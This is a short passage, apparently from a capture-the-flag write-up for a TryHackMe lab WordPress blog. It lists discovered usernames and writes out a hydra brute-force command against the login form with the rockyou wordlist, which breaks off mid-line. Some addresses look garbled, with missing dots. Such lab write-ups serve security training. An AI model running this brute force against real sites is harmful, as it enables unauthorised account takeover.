Writeup for THM Room blog
set -gx IP 1010231216
# Entry in /etc/hosts:
set -gx IP blogthm
Found http service (wordpress blog)
Found usernames: kwheel & bjoel
Brute force
hydra -l kwheel -P /usr/share/wordlists/rockyou blogthm http-post-form "/wp-loginphp:log=^USER^&pwd=^PASS^&wp-submit=Log+In&r